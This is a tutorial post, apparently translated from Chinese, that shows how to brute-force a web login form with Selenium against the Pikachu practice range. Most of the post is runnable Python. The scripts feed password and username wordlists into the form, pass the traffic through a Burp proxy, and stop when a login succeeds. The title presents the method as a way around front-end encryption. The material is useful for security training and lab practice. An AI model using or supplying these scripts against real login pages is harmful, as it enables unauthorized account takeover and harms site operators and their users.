Selenium bypasses front-end encryption

Regarding the syntax of Selenium, see the previous notes: Getting Started with Selenium

Direct blast (based on CSS)

one visit

We can use CSS expressions to easily find the location of the user name, password, and login button. By analyzing the changes in the page after login, we can find the return results of the page, and finally get a basic script.

from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.chrome.service import Service
import time

browser = webdriver.Chrome(service=Service(r'D:\tools\selenium\chromedriver.exe'))
browser.implicitly_wait(10)
browser.get('http://192.168.229.129/pikachu/vul/burteforce/bf_form.php')
time.sleep(2)

# 清空并输入用户名
username = browser.find_element(By.CSS_SELECTOR, '[name="username"]')
username.clear()  # 清除输入框已有的字符串
username.send_keys('test')  # 输入新字符串
time.sleep(2)

# 清空并输入密码
password = browser.find_element(By.CSS_SELECTOR, '[name="password"]')
password.clear()  # 清除输入框已有的字符串
password.send_keys('123')  # 输入新字符串
time.sleep(2)

# 点击登录按钮
login = browser.find_element(By.CSS_SELECTOR, '.submit')
login.click()
time.sleep(2)

# 获取登录结果
result = browser.find_element(By.CSS_SELECTOR,'.bf_form_main > p')
print(result.get_attribute('outerHTML'))

# 关闭浏览器
browser.close()

# 结果
<p> username or password is not exists～</p>

The packet capture traffic is as follows.
A js page will be accessed. Finally, a POST request is made to log in to the website. The ua is also normal.

Add proxy

Lines 6~9 of code, add bp agent

from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.chrome.service import Service
import time

# 设置代理IP的地址和端口号，类型为 HTTP 代理
proxy_address = "127.0.0.1:8080"
chrome_options = webdriver.ChromeOptions()
chrome_options.add_argument("--proxy-server=http://" + proxy_address)

# 浏览器驱动访问网站
browser = webdriver.Chrome(service=Service(r'D:\tools\selenium\chromedriver.exe'), options=chrome_options)
browser.implicitly_wait(10)
browser.get('http://192.168.229.129/pikachu/vul/burteforce/bf_form.php')
time.sleep(2)

# 清空并输入用户名
username = browser.find_element(By.CSS_SELECTOR, '[name="username"]')
username.clear()  # 清除输入框已有的字符串
username.send_keys('test')  # 输入新字符串
time.sleep(2)

# 清空并输入密码
password = browser.find_element(By.CSS_SELECTOR, '[name="password"]')
password.clear()  # 清除输入框已有的字符串
password.send_keys('123')  # 输入新字符串
time.sleep(2)

# 点击登录按钮
login = browser.find_element(By.CSS_SELECTOR, '.submit')
login.click()
time.sleep(2)

# 获取登录结果
result = browser.find_element(By.CSS_SELECTOR, '.bf_form_main > p')
print(result.get_attribute('outerHTML'))

# 关闭浏览器
browser.close()

Start blasting

Try to fix usernames and crack passwords

from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.chrome.service import Service
import time

browser = webdriver.Chrome(service=Service(r'D:\tools\selenium\chromedriver.exe'))
browser.implicitly_wait(10)
browser.get('http://192.168.229.129/pikachu/vul/burteforce/bf_form.php')
time.sleep(2)


# 设置登录
def login(try_password):
    # 清空并输入用户名
    username = browser.find_element(By.CSS_SELECTOR, '[name="username"]')
    username.clear()  # 清除输入框已有的字符串
    username.send_keys('test')  # 输入新字符串
    print('尝试用户名：test')
    # time.sleep(2)

    # 清空并输入密码
    password = browser.find_element(By.CSS_SELECTOR, '[name="password"]')
    password.clear()  # 清除输入框已有的字符串
    password.send_keys(try_password)  # 输入新字符串
    print('尝试密码：' + try_password)
    # time.sleep(2)

    # 点击登录按钮
    login = browser.find_element(By.CSS_SELECTOR, '.submit')
    login.click()
    # time.sleep(2)

    # 获取登录结果
    result = browser.find_element(By.CSS_SELECTOR, '.bf_form_main > p')
    print('尝试结果：')
    print(result.get_attribute('outerHTML') + '\n')


with open(r'C:\Users\asuka\Desktop\FastPwds.txt', 'r', encoding='utf8') as file:
    f = file.readlines()
    for i in f:
        i = i.strip().replace('\n', '')
        login(i)

# 关闭浏览器
browser.close()

You can see from the traffic that after the website is loaded, it starts to explode repeatedly.

Feel the real-time blasting screen

to filter out the results and use negative lookahead: \<p\>\s(?!username), as long as <p> "is not followed by " username, it will be displayed.

Direct blasting (based on Xpath)

Or the pikachu shooting range above?

Exploding passwords

1. Use xpath to simplify code
2. Determine whether the login is successful. Once successful, terminate the blast.

from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.chrome.service import Service
import time

browser = webdriver.Chrome(service=Service(r'D:\tools\selenium\chromedriver.exe'))
browser.implicitly_wait(10)
browser.get('http://192.168.229.129/pikachu/vul/burteforce/bf_form.php')
time.sleep(2)

# 设置登录
def login(try_password):
    # 清空并输入用户名
    username = browser.find_element(By.XPATH, '/html/body/div[2]/div[2]/div/div[2]/div/div/form/label[1]/span/input')
    username.clear()  # 清除输入框已有的字符串
    username.send_keys('test')  # 输入新字符串

    # 清空并输入密码，尝试登录
    password = browser.find_element(By.XPATH, '/html/body/div[2]/div[2]/div/div[2]/div/div/form/label[2]/span/input')
    password.clear()  # 清除输入框已有的字符串
    password.send_keys(try_password + '\n')  # 输入新字符串
    print('尝试密码：' + try_password)

    # 获取登录结果
    result = browser.find_element(By.XPATH, '/html/body/div[2]/div[2]/div/div[2]/div/div/p')
    print('尝试结果：')
    print(result.get_attribute('outerHTML') + '\n')

    # 判断是否登录成功
    if 'username or password is not exists' not in str(result.get_attribute('outerHTML')):
        print('破解成功，密码：'+try_password)
        exit()


with open(r'C:\Users\asuka\Desktop\FastPwds.txt', 'r', encoding='utf8') as file:
    f = file.readlines()
    for i in f:
        i = i.strip().replace('\n', '')
        login(i)

# 关闭浏览器
browser.close()

Explode username & add proxy

from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.chrome.service import Service

# 设置代理IP的地址和端口号，类型为 HTTP 代理
proxy_address = "127.0.0.1:8080"
chrome_options = webdriver.ChromeOptions()
chrome_options.add_argument("--proxy-server=http://" + proxy_address)

# 浏览器驱动访问网站
browser = webdriver.Chrome(service=Service(r'D:\tools\selenium\chromedriver.exe'), options=chrome_options)
browser.implicitly_wait(10)
browser.get('http://192.168.229.129/pikachu/vul/burteforce/bf_form.php')


# 设置登录
def login(try_username):
    # 清空并输入用户名
    username = browser.find_element(By.XPATH, '/html/body/div[2]/div[2]/div/div[2]/div/div/form/label[1]/span/input')
    username.clear()  # 清除输入框已有的字符串
    username.send_keys(try_username)  # 输入新字符串
    print('尝试账号：' + try_username)

    # 清空并输入密码，尝试登录
    password = browser.find_element(By.XPATH, '/html/body/div[2]/div[2]/div/div[2]/div/div/form/label[2]/span/input')
    password.clear()  # 清除输入框已有的字符串
    password.send_keys('123456' + '\n')  # 输入新字符串

    # 获取登录结果
    result = browser.find_element(By.XPATH, '/html/body/div[2]/div[2]/div/div[2]/div/div/p')
    print('尝试结果：')
    print(result.get_attribute('outerHTML') + '\n')

    # 判断是否登录成功
    if 'username or password is not exists' not in str(result.get_attribute('outerHTML')):
        print('破解成功，：' + try_username + r'/123456')
        exit()


with open(r'C:\Users\asuka\Desktop\test.txt', 'r', encoding='utf8') as file:
    f = file.readlines()
    for i in f:
        i = i.strip().replace('\n', '')
        login(i)

# 关闭浏览器
browser.quit()